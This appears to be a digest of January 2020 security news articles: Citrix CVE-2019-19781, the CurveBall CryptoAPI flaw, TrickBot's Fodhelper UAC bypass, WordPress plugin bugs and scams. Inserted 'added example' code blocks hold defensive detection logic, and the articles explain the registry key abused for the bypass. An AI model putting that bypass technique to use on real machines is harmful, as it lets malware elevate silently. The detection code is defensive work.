Named "Official Personal Data Protection Fund," the website promises to pay users of any geography if their personal data was used by an unauthorized third party.

A fake verification service can help users find out if their data ever leaked. The results of the check dictate if the user is entitled to compensation and the exact value.

This "verification" requires some personal data, though. At least the name (first and last) and phone number are required for the check to begin.

There are three specific sources to choose from - social networks, messengers, and ad networks, and details for the selected one are also needed.

The form accepts any information, Kaspersky's Tatyana Sidorina writes in a blog post on Thursday.


Regardless of what you enter in the form, results are returned and, as expected, they claim that personal data was found in leaks and that financial compensation was available.

While analyzing the fraudulent website, Kaspersky typed "fghfgh fghfgh" for the name of the user. The results returned showed that photos, videos, and contact information "repeatedly appeared in information leaks."


The compensation calculated by the fraudsters was $2,567, a sum sufficiently large to keep victims interested in how they can get it: provide a card number and the SSN.

The claim that this program is associated with the FTC while users of any geography are eligible should ring alarm bells in the first place. Spelling mistakes are also a good clue that this is a scam and should keep you from sending personal information.

Since users of any geography are accepted, not all have an SSN. The solution is to buy a temporary SSN valid for two days, for the low price of $9.32.


Even if a real SSN is provided, the website will still ask you to get a temporary one. Sidorina notes that the payment page is localized, at least for Russian IP addresses, and the price is converted to rubles.

"This is strange. Why would a U.S. government agency require payment in a foreign currency?"

Kaspersky believes that Russian speakers are behind this, as the similarity with other schemes running in Russia and the Commonwealth of Independent States (CIS) and the ruble payment form suggest.


WeLeakInfo.com Seized For Selling Info from Data Breaches, 2 Arrested
20.1.2020 
Bleepingcomputer  Incindent

As a clear indication of how law enforcement views the commercial disclosure of stolen information, the FBI has seized the WeLeakInfo.com domain and international law enforcement arrested two individuals for selling subscriptions to data exposed in breaches. These accessed credentials were then used to conduct attacks in the UK, Germany, and the US.

In coordination with the UK NCA, the Netherlands National Police Corps, the German Bundeskriminalamt, and the Police Service of Northern Ireland, the FBI took ownership of the WeLeakInfo.com domain name and added a notice stating it was seized.

WeLeakInfo.com Seizure Notice
According to a U.S. Department of Justice announcement, the domain was seized for offering subscriptions that allowed subscribers to search for specific information exposed in data breaches.

"The website had claimed to provide its users a search engine to review and obtain the personal information illegally obtained in over 10,000 data breaches containing over 12 billion indexed records – including, for example, names, email addresses, usernames, phone numbers, and passwords for online accounts. The website sold subscriptions so that any user could access the results of these data breaches, with subscriptions providing unlimited searches and access during the subscription period (one day, one week, one month, or three months)."

As part of this operation, two individuals suspected of being involved in the site were arrested in the Netherlands and Ireland; they are believed to have made £200,000 from its operation. Online payments traced back to these individuals' IP addresses indicate that they may be heavily involved in the site's operation.

The UK's NCA states that they have established links between We Leak Info and the purchase of further malware such as RATs and Cryptors.

"Law enforcement activity in the UK last year established links between the purchase of cyber crime tools, such as remote access Trojans (RATs) and cryptors, and weleakinfo.com."

The commercialization of stolen data
We Leak Info claimed to have compiled almost 12.5 billion records stolen from data breaches and allowed users to pay to access it.

To access this data, visitors could subscribe to various plans ranging from a $2 trial to a $70 three-month unlimited access account. These plans would then allow a user to perform searches that retrieve information exposed in these data breaches.

WeLeakInfo Plans
The clear distinction between We Leak Info and a service like HaveIBeenPwned is how they use data breaches: the former disclosed the stolen data itself, while the latter only notifies users that their info was exposed.

In We Leak Info's case, threat actors commonly subscribed to search for exposed usernames and passwords and then used that info to perform credential stuffing attacks, phishing attacks, and potentially network breaches.

On the other hand, HaveIBeenPwned will just tell you if an entered email is part of a data breach, but does not provide any other information.

Seizure notice thought to be a joke, even by owners
When the news broke that weleakinfo.com was seized, people were not sure if this was a prank being conducted by the owners or an actual seizure by law enforcement.

To illustrate this confusion, a poll on Twitter showed that 70% of the 492 respondents felt that this was a joke.

Voting on whether it was a prank
At the time, even We Leak Info indicated that they had no idea what was going on and tweeted that they "are currently investigating this issue."

Tweet from We Leak Info
With the press releases from law enforcement, we now have a clear picture that this was not a joke and that their operation has been shut down.

Update 1/17/20: Included information revealed in today's press release from the UK NCA.


Dutch Govt Suggests Turning Off Citrix ADC Devices, Mitigations May Fail
20.1.2020 
Bleepingcomputer  BigBrothers  Vulnerebility

Mitigation recommendations for CVE-2019-19781, a currently unpatched critical flaw affecting Citrix Application Delivery Controller (ADC) and Citrix Gateway, do not have the expected effect on all product versions.

In an updated advisory today, the software company says it has found another product that is vulnerable to the same security issue and that the advised actions do not work on some versions of Citrix ADC.

Bug makes mitigation ineffective on some Citrix ADC
Until patches become available, the company sticks to the original advice but notes that it is ineffective for Citrix ADC Release 12.1 builds before 51.16/51.19 and 50.31 because “bug exists that affects responder and rewrite policies bound to VPN virtual servers causing them not to process the packets that matched policy rules.”

The recommended course in this case is to first update to an unaffected build and then apply the mitigation steps.

Further analysis of the vulnerability and its impact on Citrix products revealed that it is also present in the Wan Optimization (WANOP) edition of the Citrix SD-WAN appliance.

The updated list of Citrix products affected by CVE-2019-19781 now looks like this:

Citrix ADC and Citrix Gateway version 13.0 all supported builds
Citrix ADC and NetScaler Gateway version 12.1 all supported builds
Citrix ADC and NetScaler Gateway version 12.0 all supported builds
Citrix ADC and NetScaler Gateway version 11.1 all supported builds
Citrix NetScaler ADC and NetScaler Gateway version 10.5 all supported builds
Citrix SD-WAN WANOP software and appliance models 4000, 4100, 5000, and 5100 all supported builds
Turn off Citrix appliance, if possible
In a warning today, the Dutch National Cybersecurity Centre (NCSC) says that companies should consider turning off Citrix ADC and Gateway servers if the impact is acceptable. Given the latest update, the organization assesses that at the moment there is no reliable solution to protect all versions of Citrix ADC and Citrix Gateway servers against CVE-2019-19781.

If turning off the appliances is not possible, NCSC strongly recommends monitoring the network for potential abuse. Further limiting the risk of exploitation is possible by whitelisting specific IP addresses or IP blocks.

Threat actors are currently exploiting the bug, both Citrix and the Dutch National Cybersecurity Center (NCSC) warn. Scanning for vulnerable Citrix ADC and Gateway appliances started in the first week of the year and multiple working exploits are available in the public space.

Firmware updates that fix the problem in all supported builds of Citrix ADC, Citrix Gateway, and SD-WAN WANOP are expected to be released by the end of January. Below is a timeline of the expected release dates:

Citrix ADC and Citrix Gateway
Version   Refresh Build   Expected Release Date
10.5      10.5.70.x       31st January 2020
11.1      11.1.63.x       20th January 2020
12.0      12.0.63.x       20th January 2020
12.1      12.1.55.x       27th January 2020
13.0      13.0.47.x       27th January 2020

Citrix SD-WAN WANOP
Release   NetScaler Release   Expected Release Date
10.2.6    11.1.63.x           27th January 2020
11.0.3    11.1.63.x           27th January 2020
Citrix recommends that customers upgrade all their vulnerable appliances to a fixed firmware version as soon as it becomes available.

The vulnerability has a severity score of 9.8 out of 10 and was publicly disclosed by Positive Technologies on December 23, 2019. Exploiting it does not require authentication and can allow an attacker who is already on the internal network to execute arbitrary code.


Windows 10 Insider Build 19546 Adds Graphing Mode to Calculator
20.1.2020 
Bleepingcomputer  OS

Microsoft has released Windows 10 Insider Preview Build 19546 to Insiders in the Fast ring, which has added a new Graphing Mode to the Windows Calculator and fixed bugs in Timeline, Outlook search, and more.

If you are a Windows Insider in the Fast ring, you can update to the Insider Preview Build 19546 by going into Settings -> Update & Security -> Windows Update and then checking for new updates.

Windows 10 Insider Build 19546

To see the full release notes and fixes for this Windows 10 insider build, you can read the blog post.

The most notable changes found in this new build released to Windows Insiders in the Fast ring are detailed below.

New Graphing Mode in Windows Calculator
The biggest change in this build is a new Graphing Mode being added to the Windows Calculator.

"Adding support for graphing is one of our top feature requests in Feedback Hub, and we’re excited to bring this feature to our users. Graphing capabilities are also essential for students who are beginning to explore linear algebra. With this feature, we hope to empower students to learn mathematics by improving their conceptual understanding and attitudes towards math."

New Graphing Mode in Windows Calculator
This new mode allows users to:

Plot one or more equations on the graph.
Add equations with variables.
Analyze the graph.
For those who are interested in testing the app, Microsoft is asking that you post suggestions and feedback in the Feedback Hub.

The new Indexer Diagnostics app
Microsoft has also released a new tool that helps you diagnose Windows search issues called the Indexer Diagnostics app.

If you are having issues with finding your content in Windows Search, you can use this tool to check if a file is indexed, look for failed queries, and check what content is being indexed.

Indexer Diagnostics app
This app is available to anyone running Windows 10 and can be downloaded here.

General changes, improvements, and fixes for PC
We fixed an issue resulting in Timeline not showing any activities.
We fixed an issue resulting in Outlook search not working for some.
We fixed an issue significantly impacting Task View reliability for some.
We fixed an issue where pressing Spatial Sound -> Off in the sound menu caused Explorer.exe to crash.
Known issues
BattlEye and Microsoft have found incompatibility issues due to changes in the operating system between some Insider Preview builds and certain versions of BattlEye anti-cheat software. To safeguard Insiders who might have these versions installed on their PC, we have applied a compatibility hold on these devices from being offered affected builds of Windows Insider Preview. See this article for details.
We are aware Narrator and NVDA users that seek the latest release of Microsoft Edge based on Chromium may experience some difficulty when navigating and reading certain web content. Narrator, NVDA and the Edge teams are aware of these issues. Users of legacy Microsoft Edge will not be affected.
The cloud recovery option for Reset this PC isn’t working on this build. Please use the local reinstall option when performing Reset this PC.
We’re looking into reports of the update process hanging for extended periods of time when attempting to install a new build.
We’re investigating reports that some Insiders are unable to update to newer builds with error 0x8007042b.
We’re looking into reports of certain external USB 3.0 drives not responding with Start Code 10 after they’re attached.
The Optimize Drives Control Panel is incorrectly reporting that optimization has never run on some devices. Optimization is completing successfully, even though it is not reflected in the UI.
The Documents section under Privacy has a broken icon (just a rectangle).
Remote Desktop Connection crashes when attempting to connect to multiple sessions.
Snipping isn’t working on secondary monitors.
The IME candidate window for East Asian IMEs (Simplified Chinese, Traditional Chinese, and the Japanese IME) may not open sometimes. We are investigating your reports. As a workaround if you encounter this, please change the focus to another application or editing area and back to the original and try again. Alternatively, you can go to Task Manager and end the “TextInputHost.exe” task from the Details tab, and it should work afterwards.


FBI to Warn State Officials of Election Infrastructure Cyber Threats
20.1.2020 
Bleepingcomputer  BigBrothers

The Federal Bureau of Investigation (FBI) today announced a change in policy requiring the timely notification of state officials of potential cyber threats to election infrastructure.

"Protecting the integrity of elections in the United States against criminal activity and national security threats is among the top priorities of the Department of Justice (DOJ) and the FBI," says a press release published today.

"Cyber intrusions affecting election infrastructure have the potential to cause significant negative impacts on the integrity of elections."

State election officials now on FBI's notification list
The new internal policy was prompted by the need to make sure that such incidents can be mitigated promptly, something that directly depends on cyber incident notifications being delivered as soon as possible and to the right people after a cyber threat is detected.

Previously, the FBI would only alert the direct victims, such as counties, of hacks affecting election equipment, which unfortunately did not always translate into an immediate response because of their limited resources for responding to such attacks.

However, this newly introduced policy will allow for speedier responses to cyber intrusions into election systems.

Chief state election officials "with ultimate authority over elections held in the state" that will be alerted by the FBI following such incidents will be able to take more suitable mitigation measures than local officials based on higher authority alone.

"Each state has a designated person to serve as its chief state election official with ultimate authority over elections held in the state, which often includes certifying election results," the FBI explains.

Understanding that mitigation of such incidents often hinges on timely notification, the FBI has established a new internal policy outlining how the FBI will notify state and local officials responsible for administering election infrastructure of cyber activity targeting their infrastructure. - FBI

More importantly, keeping both state and local election officials in the loop will allow for faster reactions, as their cybersecurity defense resources can pull together to fight cyber threats.

"Decisions surrounding notification continue to be dependent on the nature and breadth of an incident and the nature of the infrastructure impacted," the FBI concluded.

"It is the intent of the FBI that this new policy will result in increased collaboration between all levels of government for the integrity and security of U.S. elections."

Election systems part of U.S. critical infrastructure
The U.S. Department of Homeland Security (DHS) designated the country's voting and election systems as critical infrastructure in January 2017, following sanctions announced by the White House, the FBI, DHS, and the US Treasury against 35 Russian diplomats for Russia's involvement in the 2016 United States elections.

In more recent developments, during October 2019, the FBI updated and expanded a collection of resources and tools designed to help political campaigns, private businesses, and individuals to better recognize and mitigate risks posed by foreign entities' cyber intrusions and disinformation efforts during this year's U.S. election season.

"We’ve created these Protected Voices videos to showcase the methods these adversaries might use, and to help campaigns practice good cyber hygiene, because the foundation of election security is cybersecurity," Director of the FBI Chris Wray said at the time.

The DHS Incident Response Team and the Cybersecurity and Infrastructure Security Agency (CISA) also provide a list of best practices for securing elections systems as part of CISA's Security Tip ST19-002.

All these precautions are important with Microsoft saying in July 2019 that Russian-backed actors attempted to hack into the campaigns of three congressional candidates during the 2018 midterm elections.


Google Chrome Adds Protection for NSA's Windows CryptoAPI Flaw
20.1.2020 
Bleepingcomputer  BigBrothers  Safety

Google just released Chrome 79.0.3945.130, which will now detect certificates that attempt to exploit the NSA-discovered CVE-2020-0601 Windows CryptoAPI vulnerability.

As part of Microsoft's January 2020 Patch Tuesday, security updates were released for a vulnerability discovered by the NSA in the Windows CryptoAPI library Crypt32.dll.

This vulnerability allows attackers to create TLS and code-signing certificates that spoof, or impersonate, other companies to perform man-in-the-middle attacks or create phishing sites.

With PoCs for the CVE-2020-0601 vulnerability already released that allow attackers to easily create spoofed certificates, it is only a matter of time before we start to see them used in attacks.

The new version of Chrome blocks spoofed certificates
Today, Google released Chrome 79.0.3945.130, which adds new code by Google's Ryan Sleevi to further check the integrity of a website's certificate before allowing a visitor to access the site.

Added CVE-2020-0601 detections to Google Chrome
To show the new protections at work, using Kudelski Security's CVE-2020-0601 test site we can see the vulnerability being exploited on an unpatched Windows 10 PC using an older version of Google Chrome.

CVE-2020-0601 exploited in
On the same unpatched Windows 10 machine using Google Chrome 79.0.3945.130, when you visit the site again the browser now warns that "Attackers might be trying to steal your information".

Google Chrome 79.0.3945.130 with CVE-2020-0601 detection
Sleevi states that this check is "not perfect", but is good enough for now as users roll out the security updates to their operating systems and Google switches to better verifiers.

"This isn't perfect, but is enough of a safety check until we switch to our verifier or tighten down the blocking of 3P modules, even for CAPI."

It would not be surprising to see other browsers and security software start integrating detection for CVE-2020-0601 into their products, so that even if a company can't immediately install the security patches, it will have a modicum of protection against the vulnerability.


WordPress Plugin Bugs Let Hackers Wipe or Takeover Your Site
20.1.2020 
Bleepingcomputer  Hacking

Critical bugs found in the WordPress Database Reset plugin used by over 80,000 sites allow attackers to drop all users and get automatically elevated to an administrator role and to reset any table in the database.

The open-source WP Database Reset WordPress plugin maintained by WebFactory Ltd is designed to help reset databases to default settings with a few mouse clicks, wiping all the data stored in the database, including posts, pages, users, and more.

WP Database Reset makes it possible to choose between resetting a website's entire database or only specific tables.

Using the WP Database Reset plugin (WebFactory Ltd)
Unauthenticated database reset and privilege escalation
The two vulnerabilities tracked as CVE-2020-7048 and CVE-2020-7047, rated as Critical and High severity, were patched with the release of WP Database Reset 3.15, a week after the initial disclosure from WordFence, the WordPress security firm that discovered the flaw.

During the last two days since the patched version was released, a little over 8,300 users have already updated their installations, with more than 71,000 still having to secure their websites from potential attacks.

"One of these flaws allowed any unauthenticated user to reset any table from the database to the initial WordPress set-up state, while the other flaw allowed any authenticated user, even those with minimal permissions, the ability to grant their account administrative privileges while dropping all other users from the table with a simple request," WordFence's Chloe Chamberland says.

Successful exploitation of the two flaws on unpatched WordPress sites could lead to full site takeover and/or database reset.

Vulnerable database reset function (WordFence)
The CVE-2020-7048 authentication bypass flaw is caused by improper authentication stemming from missing capability checks or security nonce protection.

Poorly implemented privilege management is behind CVE-2020-7047, a bug that allows site users with subscriber or higher permissions to reset the wp_users table, dropping all other users with a simple request and automatically getting elevated to an admin role.

"A site owner allowing open registration on a site with a vulnerable version of the WP Database Reset plugin could lose control of their site," the Wordfence Threat Intelligence team report adds.

To defend against attacks abusing these flaws, the security outfit advises admins to update to WP Database Reset 3.15 immediately and to keep up-to-date site backups stored on a different server than the one hosting their WordPress installation.

WordFence also created a video demonstration of how an exploit targeting these vulnerabilities would work.



TrickBot Now Uses a Windows 10 UAC Bypass to Evade Detection
20.1.2020 
Bleepingcomputer  BotNet  OS

The TrickBot Trojan has received an update that adds a UAC bypass targeting the Windows 10 operating system so that it infects users without displaying any visible prompts.

A UAC bypass allows programs to be launched without displaying a User Account Control prompt that asks users to allow a program to run with administrative privileges.

Example of UAC prompt
In a new TrickBot sample, Head of SentinelLabs Vitali Kremez discovered that the trojan is now using the Windows 10 Fodhelper bypass.

Using Windows 10 UAC bypass
When executed, TrickBot will check if the operating system is Windows 7 or Windows 10.

If it is Windows 7, TrickBot will utilize the CMSTPLUA UAC bypass, and if it is Windows 10, it will now use the Fodhelper UAC bypass.

The Fodhelper bypass was discovered in 2017 and uses the legitimate Microsoft C:\Windows\system32\fodhelper.exe executable to execute other programs with administrative privileges.

"Fodhelper.exe is a trusted binary on Windows 10 that TrickBot uses to execute the malware stage bypassing UAC via the registry method," Kremez told BleepingComputer in a conversation.

If that key has been configured, Fodhelper will, when executed, also launch any command stored in the default value of the HKCU\Software\Classes\ms-settings\shell\open\command key.

As Fodhelper is a trusted Windows executable, it allows auto-elevation without displaying a UAC prompt. Any programs that it executes will be executed without showing a UAC prompt as well.

TrickBot utilizes this bypass to launch itself without any warning to the user, thus escaping the user's notice.

Command executed by the Fodhelper UAC bypass
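Added example, not from the article or SentinelLabs: detection logic in Python that runs over constructed event lines (field names loosely follow Sysmon's registry value-set and process-create events; not a real capture, and the paths and SID are placeholders) and flags the three observable steps of the Fodhelper bypass described above: a user-mode process writing the ms-settings\shell\open\command value, fodhelper.exe being launched by that writer, and an elevated child of fodhelper.exe.

```python
import re

# Registry path named in the article; Windows does not create it by default, so any
# write to it from a user-mode process is worth an alert on its own.
HIJACK_KEY = r"software\classes\ms-settings\shell\open\command"
FODHELPER = r"\fodhelper.exe"

# Constructed sample events (EventID 13 = registry value set, 1 = process create).
SAMPLE_EVENTS = [
    r"EventID=13 Image=C:\Users\bob\AppData\Local\Temp\update.exe "
    r"TargetObject=HKU\S-1-5-21-1111-2222-3333-1001\Software\Classes\ms-settings\shell\open\command\(Default) "
    r"Details=C:\Users\bob\AppData\Local\Temp\update.exe",
    r"EventID=1 Image=C:\Windows\System32\fodhelper.exe "
    r"ParentImage=C:\Users\bob\AppData\Local\Temp\update.exe IntegrityLevel=High",
    r"EventID=1 Image=C:\Users\bob\AppData\Local\Temp\update.exe "
    r"ParentImage=C:\Windows\System32\fodhelper.exe IntegrityLevel=High",
    # benign noise: the Settings app started the normal way
    r"EventID=1 Image=C:\Windows\ImmersiveControlPanel\SystemSettings.exe "
    r"ParentImage=C:\Windows\System32\svchost.exe IntegrityLevel=Medium",
]

FIELD_RE = re.compile(r"(\w+)=(\S+)")


def parse_event(line):
    # The constructed values contain no spaces, so key=value splitting is enough here.
    return dict(FIELD_RE.findall(line))


def detect_fodhelper_bypass(lines):
    """Return (rule, process, detail) findings; later rules correlate with earlier ones."""
    findings = []
    key_writers = set()  # processes that planted the hijack value
    for raw in lines:
        ev = parse_event(raw)
        eid = ev.get("EventID")
        image = ev.get("Image", "").lower()
        if eid == "13" and HIJACK_KEY in ev.get("TargetObject", "").lower():
            key_writers.add(image)
            findings.append(("hijack-key-written", image, ev.get("Details")))
        elif eid == "1":
            parent = ev.get("ParentImage", "").lower()
            # fodhelper.exe started by the same process that planted the value
            if image.endswith(FODHELPER) and parent in key_writers:
                findings.append(("fodhelper-launched-by-key-writer", parent, None))
            # fodhelper.exe auto-elevates, so an elevated child is the payload running
            if parent.endswith(FODHELPER) and ev.get("IntegrityLevel") == "High":
                confidence = "high" if image in key_writers else "medium"
                findings.append(("elevated-child-of-fodhelper", image, confidence))
    return findings


if __name__ == "__main__":
    for finding in detect_fodhelper_bypass(SAMPLE_EVENTS):
        print(finding)
```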
As more users move to Windows 10 and as Windows Defender matures, more malware has begun to target the operating system and its security features.

In September 2019 we reported that the GootKit banking Trojan had also added the Fodhelper bypass, using it to execute a command that whitelists the malware executable's path in Windows Defender.

In July 2019, TrickBot also targeted Windows Defender by trying to disable various scan options. With the inclusion of Fodhelper, we continue to see the malware developers attempt to reduce the security features found in Windows 10.


PoCs for Windows CryptoAPI Bug Are Out, Show Real-Life Exploit Risks
20.1.2020 
Bleepingcomputer  Exploit

Proof-of-concept exploit code is now available for the Windows CryptoAPI spoofing vulnerability tracked as CVE-2020-0601 and reported by the National Security Agency (NSA), just two days after Microsoft released a patch.

The PoC exploits for the flaw now known as CurveBall (per security researcher Tal Be'ery) were publicly released during the last 24 hours by Swiss cybersecurity outfit Kudelski Security and ollypwn.

British hardware hacker Saleem Rashid also developed a CurveBall PoC exploit but only tweeted screenshots of his exploit code abusing CVE-2020-0601.

Saleem Rashid
@saleemrash1d
CVE-2020-0601

6:16 PM - Jan 15, 2020
What's next? Well, after these working PoC exploits were released, users and organizations should patch their systems by applying the security updates Microsoft released during this month's Patch Tuesday.

While the NSA and Microsoft stated that the flaw hasn't yet been exploited in the wild, the agency's advisory recommends installing the patches as soon as possible to block attackers from defeating "trusted network connections and deliver executable code while appearing as legitimately trusted entities."

DHS' Cybersecurity and Infrastructure Security Agency (CISA) also strongly recommended agencies to "patch all affected endpoints within 10 business days" in its second-ever Emergency Directive.

Kudelski Security
@KudelskiSec
On Jan 14. @Microsoft addressed a critical flaw discovered by the #NSA in the #Windows10, Windows Server 2016 and 2019 versions of crypt32.dll, the library implementing Windows' CryptoAPI. @AnomalRoil explains the flaw, and demonstrates it with a POC. https://hubs.ly/H0mCq570

4:15 PM - Jan 16, 2020
What's the potential impact of an attack exploiting CVE-2020-0601?
The spoofing vulnerability impacts Windows 10, Windows Server 2016 and 2019 versions of CRYPT32.DLL, while "an attacker could exploit the vulnerability by using a spoofed code-signing certificate to sign a malicious executable, making it appear the file was from a trusted, legitimate source," according to Microsoft.

On compromised systems, attackers can launch man-in-the-middle attacks, as well as decrypt confidential info from network connections to impacted software and endpoints.

CERT/CC vulnerability analyst Will Dormann also revealed that "by exploiting this vulnerability, an attacker may be able to spoof a valid X.509 certificate chain on a vulnerable Windows system.

This may allow various actions including, but not limited to, interception and modification of TLS-encrypted communications or spoofing an Authenticode signature."

Chrome PoC on patched system
Chrome PoC on unpatched system
As Crowdstrike co-founder Dmitri Alperovitch further explained, the potential impact of CVE-2020-0601 includes remote code execution (due to auth bypass), compromise of HTTPS authentication, spoofing code signing (in user-mode), and spoofing content signing.

The code execution was also confirmed by the NSA: "The certificate validation vulnerability allows an attacker to undermine how Windows verifies cryptographic trust and can enable remote code execution."
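Added example in Python, not Chrome's, Microsoft's or any PoC's code, serving both the Chrome check described in the previous article and the impact discussion here: CVE-2020-0601 hinges on ECC certificates that carry explicit curve parameters instead of a named-curve OID, a detail the articles do not spell out. The classifier below reads a SubjectPublicKeyInfo with a hand-rolled DER parser and shows the policy a hardened verifier can apply (refuse explicit parameters); the RSA case illustrates why an RSA-signed update channel is out of scope. The OIDs are the standard ones; the SPKI blobs and key bytes are constructed placeholders.

```python
# Added example, not Chrome's or Microsoft's code: classify an ECC SubjectPublicKeyInfo by
# whether its AlgorithmIdentifier names a curve by OID or ships explicit parameters.
EC_PUBLIC_KEY = "1.2.840.10045.2.1"     # id-ecPublicKey
PRIME_FIELD = "1.2.840.10045.1.1"       # prime-field, used inside explicit ECParameters
P256 = "1.2.840.10045.3.1.7"            # prime256v1 named curve
RSA_ENC = "1.2.840.113549.1.1.1"        # rsaEncryption


def tlv(tag, payload):  # minimal DER encoder: tag, definite length (short/long form), payload
    n = len(payload)
    if n < 0x80:
        length = bytes([n])
    else:
        lb = n.to_bytes((n.bit_length() + 7) // 8, "big")
        length = bytes([0x80 | len(lb)]) + lb
    return bytes([tag]) + length + payload


def oid_body(dotted):  # base-128 OID encoding, first two arcs packed into one byte
    arcs = [int(a) for a in dotted.split(".")]
    out = bytearray([40 * arcs[0] + arcs[1]])
    for arc in arcs[2:]:
        chunk = [arc & 0x7F]
        arc >>= 7
        while arc:
            chunk.append((arc & 0x7F) | 0x80)
            arc >>= 7
        out.extend(reversed(chunk))
    return bytes(out)


def oid(dotted):
    return tlv(0x06, oid_body(dotted))


def decode_oid(body):
    arcs, val = [body[0] // 40, body[0] % 40], 0
    for b in body[1:]:
        val = (val << 7) | (b & 0x7F)
        if not b & 0x80:
            arcs.append(val)
            val = 0
    return ".".join(map(str, arcs))


def read_tlv(buf, pos):  # (tag, payload, end) of the DER element at buf[pos], bounds-checked
    tag, length, pos = buf[pos], buf[pos + 1], pos + 2
    if length & 0x80:
        nbytes = length & 0x7F
        length = int.from_bytes(buf[pos:pos + nbytes], "big")
        pos += nbytes
    end = pos + length
    if end > len(buf):
        raise ValueError("DER length exceeds buffer")
    return tag, buf[pos:end], end


def classify_spki(spki):
    """Return (kind, detail): not-ec, ec-named-curve, ec-explicit-params or ec-unknown-params."""
    tag, body, end = read_tlv(spki, 0)
    if tag != 0x30 or end != len(spki):
        raise ValueError("not a SubjectPublicKeyInfo SEQUENCE")
    atag, alg, _ = read_tlv(body, 0)
    if atag != 0x30:
        raise ValueError("missing AlgorithmIdentifier")
    otag, alg_oid, p = read_tlv(alg, 0)
    if otag != 0x06:
        raise ValueError("AlgorithmIdentifier does not start with an OID")
    if alg_oid != oid_body(EC_PUBLIC_KEY):
        return "not-ec", decode_oid(alg_oid)
    if p >= len(alg):
        return "ec-unknown-params", None
    ptag, params, _ = read_tlv(alg, p)
    if ptag == 0x06:   # namedCurve OID: the only form a hardened verifier should trust
        return "ec-named-curve", decode_oid(params)
    if ptag == 0x30:   # ECParameters SEQUENCE: caller-supplied field, curve, generator, order
        return "ec-explicit-params", None
    return "ec-unknown-params", None


def should_reject(spki):  # policy: refuse any EC key that is not bound to a named curve
    kind, _ = classify_spki(spki)
    return kind.startswith("ec-") and kind != "ec-named-curve"


FAKE_POINT = b"\x04" + b"\x11" * 64  # constructed placeholder, not a real public key


def named_curve_spki():
    alg = tlv(0x30, oid(EC_PUBLIC_KEY) + oid(P256))
    return tlv(0x30, alg + tlv(0x03, b"\x00" + FAKE_POINT))


def explicit_params_spki():
    # ECParameters laid out as in RFC 3279 (version, fieldID, curve, base, order, cofactor)
    # with placeholder values; it exceeds 127 bytes, so long-form lengths get exercised too.
    field_id = tlv(0x30, oid(PRIME_FIELD) + tlv(0x02, b"\x00" + b"\xff" * 32))
    curve = tlv(0x30, tlv(0x04, b"\xaa" * 32) + tlv(0x04, b"\xbb" * 32))
    params = tlv(0x30, tlv(0x02, b"\x01") + field_id + curve + tlv(0x04, b"\x04" + b"\xcc" * 64)
                 + tlv(0x02, b"\x00" + b"\xdd" * 32) + tlv(0x02, b"\x01"))
    alg = tlv(0x30, oid(EC_PUBLIC_KEY) + params)
    return tlv(0x30, alg + tlv(0x03, b"\x00" + FAKE_POINT))


def rsa_spki():
    alg = tlv(0x30, oid(RSA_ENC) + tlv(0x05, b""))
    return tlv(0x30, alg + tlv(0x03, b"\x00" + b"\x22" * 40))
```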

Updated Windows logs exploitation attempts
Crowdstrike's head of EDR, Alex Ionescu and former Project Zero member Matt Tait confirmed yesterday that the Windows Update (WU) system — which was initially thought to have been also impacted — is not affected.

This is because the updates are signed with RSA certificates rather than ECC-based ones, preventing attackers from abusing it as part of MiTM attacks to serve malicious code.

Luckily, as security researcher and co-director of the Open Crypto Audit Project (OCAP) Kenneth White noticed, some vendors including Crowdstrike already updated their security solutions to detect CurveBall exploitation attempts, while Microsoft updated Windows Defender to detect "files w/crafted certificates exploiting the certificate validation vulnerability," per Microsoft Defender ATP Product Manager Amitai Rottem.

Windows Event Viewer logging exploit attempts
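The Event Viewer entries mentioned above can be pulled centrally rather than read one machine at a time. The following PowerShell is an added example, not code from the article or from any vendor named in it. It assumes that the patched CRYPT32.DLL writes its detections to the Application log under the provider Microsoft-Windows-Audit-CVE (shown as "Audit-CVE" in Event Viewer) with Event ID 1 and a message containing "[CVE-2020-0601]"; the function name and parameters are this example's own.

```powershell
# Added example: collect CVE-2020-0601 detection events written by patched systems.
# Assumptions (not from the article): provider Microsoft-Windows-Audit-CVE / Audit-CVE,
# Event ID 1, message containing "[CVE-2020-0601]". Adjust if your fleet differs.
function Get-CurveBallDetections {
    param(
        [string[]]$ComputerName = @($env:COMPUTERNAME),
        [int]$Days = 30
    )

    $filter = @{
        LogName      = 'Application'
        ProviderName = @('Microsoft-Windows-Audit-CVE', 'Audit-CVE')
        Id           = 1
        StartTime    = (Get-Date).AddDays(-$Days)
    }

    foreach ($computer in $ComputerName) {
        # Get-WinEvent throws when nothing matches, so suppress that and return nothing
        # for clean hosts instead of aborting the whole sweep.
        Get-WinEvent -ComputerName $computer -FilterHashtable $filter -ErrorAction SilentlyContinue |
            Where-Object { $_.Message -match 'CVE-2020-0601' } |
            Select-Object @{ Name = 'Computer'; Expression = { $computer } },
                          TimeCreated,
                          Id,
                          Message
    }
}

# Usage: sweep the local machine for the last week and summarise per host.
$hits = Get-CurveBallDetections -Days 7
if ($hits) {
    $hits | Group-Object Computer |
        Select-Object Name, Count, @{ Name = 'Latest'; Expression = { ($_.Group | Sort-Object TimeCreated -Descending)[0].TimeCreated } } |
        Format-Table -AutoSize
} else {
    Write-Output 'No CVE-2020-0601 detection events found in the requested window.'
}
```

A hit only means a patched host rejected a crafted certificate; it says nothing about unpatched hosts, where nothing is logged, so the query should be paired with patch-compliance reporting rather than used as the sole indicator.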
To sum it all up, per the NSA "the consequences of not patching the vulnerability are severe and widespread. Remote exploitation tools will likely be made quickly and widely available.

Rapid adoption of the patch is the only known mitigation at this time and should be the primary focus for all network owners."

"In the end, please keep in mind that such a vulnerability is not at risk of being exploited by script kiddies or ransomware," Kudelski Security also added.

"While it is still a big problem because it could have allowed a Man-in-the-Middle attack against any website, you would need to face an adversary that owns the network on which you operate, which is possible for nation-state adversaries, but less so for a script kiddie.

This is why we are releasing this PoC, the exploitability of this vulnerability is not good enough to lead to a sudden ransomware threat (unlike the one we had with Wannacry)."


Google to Kill Chrome Apps Across All Platforms
20.1.2020 
Bleepingcomputer  Security

Google announced that it will slowly phase out support for Chrome apps on all operating systems until they will completely stop working in June 2022 for all users.

Chrome apps are HTML5, CSS, and JavaScript-based web apps that can be installed via the Google Chrome browser for a user experience comparable to that of native applications.

They were officially introduced and made available for download in the Chrome Web Store in May 2013 as "Chrome packaged apps," following the unveiling of a Chrome app launcher developer preview in February 2013.

Chrome Apps phase-out timeline
While this might come as a surprise for some Chrome apps users, this was an announcement expected for a while now given that Google already said in 2016 that "in the second half of 2017, the Chrome Web Store will no longer show Chrome apps on Windows, Mac, and Linux [..]"

